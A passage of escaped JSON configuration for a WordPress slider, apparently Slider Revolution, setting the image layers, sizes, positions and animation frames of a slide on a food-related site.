eed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"4\":{\"text\":\"Image 4\",\"alias\":\"Lime\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h2-slide3-graphic-3.png\",\"imageId\":2540},\"size\":{\"width\":{\"d\":{\"v\":\"497px\",\"e\":true},\"n\":{\"v\":\"497px\",\"e\":true},\"t\":{\"v\":\"306px\",\"e\":true},\"m\":{\"v\":\"184px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"509px\",\"e\":true},\"n\":{\"v\":\"509px\",\"e\":true},\"t\":{\"v\":\"313px\",\"e\":true},\"m\":{\"v\":\"188px\",\"e\":true}},\"originalWidth\":439,\"originalHeight\":484,\"aspectRatio\":{\"d\":{\"v\":0.90702479338842978418000484452932141721248626708984375},\"n\":{\"v\":0.90702479338842978418000484452932141721248626708984375},\"t\":{\"v\":0.90702479338842978418000484452932141721248626708984375},\"m\":{\"v\":0.90702479338842978418000484452932141721248626708984375}}},\"position\":{\"x\":{\"d\":{\"v\":\"160px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-150px\",\"e\":true},\"n\":{\"v\":\"-180px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"9px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":290},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1920,\"start\":290,\"startRelative\":290},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1920,\"start\":290,\"startRelative\":290},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":-110,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Paprika\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h2-slide3-graphic-5.png\",\"imageId\":2542},\"size\":{\"width\":{\"d\":{\"v\":\"255px\",\"e\":true},\"n\":{\"v\":\"216px\",\"e\":true},\"t\":{\"v\":\"246px\",\"e\":true},\"m\":{\"v\":\"138px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"350px\",\"e\":true},\"n\":{\"v\":\"296px\",\"e\":true},\"t\":{\"v\":\"336px\",\"e\":true},\"m\":{\"v\":\"189px\",\"e\":true}},\"originalWidth\":390,\"originalHeight\":359,\"aspectRatio\":{\"d\":{\"v\":1.086350974930362145443041299586184322834014892578125},\"n\":{\"v\":1.086350974930362145443041299586184322834014892578125},\"t\":{\"v\":1.086350974930362145443041299586184322834014892578125},\"m\":{\"v\":1.086350974930362145443041299586184322834014892578125}}},\"position\":{\"x\":{\"d\":{\"v\":\"-5px\",\"e\":true},\"n\":{\"v\":\"-93px\",\"e\":true},\"t\":{\"v\":\"2px\",\"e\":true},\"m\":{\"v\":\"2px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-120px\",\"e\":true},\"n\":{\"v\":\"33px\",\"e\":true},\"t\":{\"v\":\"51px\",\"e\":true},\"m\":{\"v\":\"51px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":340},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":2020,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":2020,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":-260,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"7\":{\"text\":\"Image 6\",\"alias\":\"Image 6\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/03\\/shutterstock_677295580bc.png\",\"imageId\":3732},\"size\":{\"width\":{\"d\":{\"v\":\"669px\",\"e\":true},\"n\":{\"v\":\"568px\",\"e\":true},\"t\":{\"v\":\"378\",\"e\":true},\"m\":{\"v\":\"236\",\"e\":true}},\"height\":{\"d\":{\"v\":\"707px\",\"e\":true},\"n\":{\"v\":\"600px\",\"e\":true},\"t\":{\"v\":\"400px\",\"e\":true},\"m\":{\"v\":\"250px\",\"e\":true}},\"originalWidth\":543,\"originalHeight\":574,\"aspectRatio\":{\"d\":{\"v\":0.94599303135888501703476549664628691971302032470703125},\"n\":{\"v\":0.94599303135888501703476549664628691971302032470703125},\"t\":{\"v\":0.94599303135888501703476549664628691971302032470703125},\"m\":{\"v\":0.94599303135888501703476549664628691971302032470703125}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"40px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":380},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1840,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1840,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":-120,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"9\":{\"text\":\"Image 7\",\"alias\":\"Image 7\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic6.png\",\"imageId\":1083},\"size\":{\"width\":{\"d\":{\"v\":\"441px\",\"e\":true},\"n\":{\"v\":\"441px\"},\"t\":{\"v\":\"313px\",\"e\":true},\"m\":{\"v\":\"215px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"357px\",\"e\":true},\"n\":{\"v\":\"357px\"},\"t\":{\"v\":\"253px\",\"e\":true},\"m\":{\"v\":\"174px\",\"e\":true}},\"originalWidth\":441,\"originalHeight\":357,\"aspectRatio\":{\"d\":{\"v\":1.23529411764705887577520115883089601993560791015625},\"n\":{\"v\":1.23529411764705887577520115883089601993560791015625},\"t\":{\"v\":1.23529411764705887577520115883089601993560791015625},\"m\":{\"v\":1.23529411764705887577520115883089601993560791015625}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"40px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":460},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1640,\"start\":460,\"startRelative\":460},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1640,\"start\":460,\"startRelative\":460},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0